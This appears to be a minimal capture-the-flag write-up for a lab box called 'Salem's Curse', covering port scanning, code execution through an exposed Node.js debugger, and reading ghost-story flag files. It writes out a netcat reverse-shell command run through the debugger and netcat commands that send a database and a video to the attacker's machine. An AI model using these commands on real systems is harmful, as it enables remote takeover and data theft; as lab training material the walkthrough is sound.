Salem's Curse

Minimal writeup

1. Footprinting:

┌──(kali㉿kali)-[~]
└─$ nmap -g53 -sS -T4 -p- -Pn -n --min-rate 4000 --disable-arp-ping salemmanor.hv
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-05 02:41 +07
Warning: 172.20.7.110 giving up on port because retransmission cap hit (6).
Nmap scan report for salemmanor.hv (172.20.7.110)
Host is up (0.16s latency).
Not shown: 65182 closed tcp ports (reset), 350 filtered tcp ports (no-response)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3000/tcp open  ppp

Nmap done: 1 IP address (1 host up) scanned in 36.93 seconds

┌──(kali㉿kali)-[~]
└─$ nmap -g53 -sCV -p22,80,3000 -Pn -n --disable-arp-ping salemmanor.hv
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-05 02:42 +07
Nmap scan report for salemmanor.hv (172.20.7.110)
Host is up (0.048s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 95:30:f3:df:a0:a0:f5:2c:cb:3a:f7:4a:7d:c4:62:d5 (RSA)
|   256 21:d6:55:80:3b:05:0b:b6:f2:f3:0d:07:65:6a:87:41 (ECDSA)
|_  256 6b:5a:cd:21:7f:e0:a5:b2:96:02:18:13:56:db:8c:86 (ED25519)
80/tcp   open  http    Node.js (Express middleware)
|_http-title: Salem Manor Museum - Where History Haunts
3000/tcp open  ppp?
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, GetRequest, HTTPOptions, Help, Kerberos, NCP, RPCCheck, RTSPRequest, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServerCookie: 
|     HTTP/1.0 400 Bad Request
|     Content-Type: text/html; charset=UTF-8
|_    WebSockets request was expected
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3000-TCP:V=7.95%I=7%D=11/5%Time=690A5728%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,65,"HTTP/1\.0\x20400\x20Bad\x20Request\r\nContent-Type:\x20tex
SF:t/html;\x20charset=UTF-8\r\n\r\nWebSockets\x20request\x20was\x20expecte
SF:d\r\n")%r(Help,65,"HTTP/1\.0\x20400\x20Bad\x20Request\r\nContent-Type:\
SF:x20text/html;\x20charset=UTF-8\r\n\r\nWebSockets\x20request\x20was\x20e
SF:xpected\r\n")%r(NCP,65,"HTTP/1\.0\x20400\x20Bad\x20Request\r\nContent-T
SF:ype:\x20text/html;\x20charset=UTF-8\r\n\r\nWebSockets\x20request\x20was
SF:\x20expected\r\n")%r(HTTPOptions,65,"HTTP/1\.0\x20400\x20Bad\x20Request
SF:\r\nContent-Type:\x20text/html;\x20charset=UTF-8\r\n\r\nWebSockets\x20r
SF:equest\x20was\x20expected\r\n")%r(RTSPRequest,65,"HTTP/1\.0\x20400\x20B
SF:ad\x20Request\r\nContent-Type:\x20text/html;\x20charset=UTF-8\r\n\r\nWe
SF:bSockets\x20request\x20was\x20expected\r\n")%r(RPCCheck,65,"HTTP/1\.0\x
SF:20400\x20Bad\x20Request\r\nContent-Type:\x20text/html;\x20charset=UTF-8
SF:\r\n\r\nWebSockets\x20request\x20was\x20expected\r\n")%r(DNSVersionBind
SF:ReqTCP,65,"HTTP/1\.0\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/
SF:html;\x20charset=UTF-8\r\n\r\nWebSockets\x20request\x20was\x20expected\
SF:r\n")%r(DNSStatusRequestTCP,65,"HTTP/1\.0\x20400\x20Bad\x20Request\r\nC
SF:ontent-Type:\x20text/html;\x20charset=UTF-8\r\n\r\nWebSockets\x20reques
SF:t\x20was\x20expected\r\n")%r(SSLSessionReq,65,"HTTP/1\.0\x20400\x20Bad\
SF:x20Request\r\nContent-Type:\x20text/html;\x20charset=UTF-8\r\n\r\nWebSo
SF:ckets\x20request\x20was\x20expected\r\n")%r(TerminalServerCookie,65,"HT
SF:TP/1\.0\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/html;\x20char
SF:set=UTF-8\r\n\r\nWebSockets\x20request\x20was\x20expected\r\n")%r(TLSSe
SF:ssionReq,65,"HTTP/1\.0\x20400\x20Bad\x20Request\r\nContent-Type:\x20tex
SF:t/html;\x20charset=UTF-8\r\n\r\nWebSockets\x20request\x20was\x20expecte
SF:d\r\n")%r(Kerberos,65,"HTTP/1\.0\x20400\x20Bad\x20Request\r\nContent-Ty
SF:pe:\x20text/html;\x20charset=UTF-8\r\n\r\nWebSockets\x20request\x20was\
SF:x20expected\r\n")%r(SMBProgNeg,65,"HTTP/1\.0\x20400\x20Bad\x20Request\r
SF:\nContent-Type:\x20text/html;\x20charset=UTF-8\r\n\r\nWebSockets\x20req
SF:uest\x20was\x20expected\r\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.05 seconds

2. First Question: This question could be answered by add the host

3. Second Question: This could be solved by connecting to the debugger on port 3000:

┌──(kali㉿kali)-[~]
└─$ node inspect 172.20.7.110:3000
connecting to 172.20.7.110:3000 ... ok
debug> exec process.mainModule.require('child_process').execSync('nc -e /bin/bash 10.8.5.10 4444').toString()

Setting up the penelope handler:

┌──(kali㉿kali)-[~]
└─$ penelope                                             
[+] Listening for reverse shells on 0.0.0.0:4444 →  127.0.0.1 • 192.168.1.9 • 192.168.2.129 • 172.17.0.1 • 10.8.5.10
➤  🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from salemmanormuseum~172.20.7.110-Linux-x86_64 😍 Assigned SessionID <1>
[+] Attempting to upgrade shell to PTY...
[+] Shell upgraded successfully using /usr/bin/python3! 💪
[+] Interacting with session [1], Shell Type: PTY, Menu key: F12 
[+] Logging to /home/kali/.penelope/sessions/salemmanormuseum~172.20.7.110-Linux-x86_64/2025_11_05-04_04_37-537.log 📜
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
root@salemmanormuseum:~/museum# whoami
root
root@salemmanormuseum:~/museum# ls -lah
total 208K
drwxr-xr-x   5 root root 4.0K Oct 26 06:38 .
drwx------   6 root root 4.0K Oct 26 08:26 ..
-rw-r--r--   1 root root  32K Oct 26 06:36 blog_posts.db
-rw-r--r--   1 root root 4.6K Oct 26 07:53 museum_app.js
drwxr-xr-x 186 root root 4.0K Oct 23 09:49 node_modules
-rw-r--r--   1 root root  555 Oct 26 07:35 package.json
-rw-r--r--   1 root root 143K Oct 23 09:49 package-lock.json
drwxr-xr-x   6 root root 4.0K Oct 24 10:39 public
drwxr-xr-x   2 root root 4.0K Oct 24 09:13 views
root@salemmanormuseum:~/museum# nc 10.8.5.10 9001 < blog_posts.db

Open the `.db` on your Kali to answer the question

4. The 3rd question:

root@salemmanormuseum:/home/crane/notes# cat discovery.txt
GOT IT!!!



Verified 3x - matches GPR anomaly perfectly
6 feet depth - deliberate burial
Iron box, sealed 333 years ago

UV analysis of Blackwood's letters revealed what's inside:
His secret grimoire - handwritten manuscript
"The Book of Binding and Breaking"
Contains curse techniques AND counter-curses
He hid the solution to his own work

This changes everything

---

Called archaeologist
Excavation Monday

---

Archive feels wrong
Cold, lights flickering

---

Something's wrong
Temp dropping
Not alone

---

I can feel his presence
He's here
Standing in the doorway
Watching me


42.XXX,-70.XXX # The answer

Someone find

root@salemmanormuseum:/home/crane/notes#

5. The last question:

root@salemmanormuseum:~/museum# cd /mnt
root@salemmanormuseum:/mnt# ls -lah
total 12K
drwxr-xr-x  3 root root 4.0K Jan  1  1970 .
drwxr-xr-x 18 root root 4.0K Dec 27  2024 ..
drwxr-xr-x  2 root root 4.0K Jan  1  1970 camera_recordings
root@salemmanormuseum:/mnt# cd camera_recordings/
root@salemmanormuseum:/mnt/camera_recordings# ls -lah
total 2.1M
drwxr-xr-x 2 root root 4.0K Jan  1  1970 .
drwxr-xr-x 3 root root 4.0K Jan  1  1970 ..
-rw-r--r-- 1 root root 2.1M Jan  1  1970 archive_cam01_incident.mp4
-rw-r--r-- 1 root root 1.3K Jan  1  1970 archive_room_cam01_20251025.log
-rw-r--r-- 1 root root  750 Jan  1  1970 camera-2025-10-25_segment3.timeline
-rw-r--r-- 1 root root  950 Jan  1  1970 temperature_sensors_20251025.log
root@salemmanormuseum:/mnt/camera_recordings# cat camera-2025-10-25_segment3.timeline
SECURITY CAMERA - INCIDENT FOOTAGE NOTES
Camera: ARCHIVE-CAM-01
Date: October 25, 2025
Type: IR (Infrared) Recording

============================================================

SEQUENCE SUMMARY:

Phase 1: Normal Activity
- Subject working at desk
- Typing, document examination
- Standard behavior patterns

Phase 2: Environmental Anomalies
- Lighting begins to flicker
- Subject appears uneasy
- Temperature drop detected (external sensors)

Phase 3: CRITICAL - IR Mode Engaged
- Complete lighting failure
- Camera switches to infrared automatically
- Thermal signatures visible

ANOMALY DETECTED:
- Second thermal source appears in frame
- Primary subject thermal signature vanishes
- No door exit recorded
- Secondary signature moves and exits
root@salemmanormuseum:/mnt/camera_recordings# nc 10.8.5.10. 9001 < archive_cam01_incident.mp4

Open the video on our machine to answer the final question.

PreviousTryhackme - Chillhack II - Second Wind

Last updated 4 months ago

hashtag1. Footprinting:

hashtag2. First Question: This question could be answered by add the host

hashtag3. Second Question: This could be solved by connecting to the debugger on port 3000:

hashtagOpen the .db on your Kali to answer the question

hashtag4. The 3rd question:

hashtag5. The last question:

hashtagOpen the video on our machine to answer the final question.

1. Footprinting:

2. First Question: This question could be answered by add the host

3. Second Question: This could be solved by connecting to the debugger on port 3000:

Open the `.db` on your Kali to answer the question

4. The 3rd question:

5. The last question:

Open the video on our machine to answer the final question.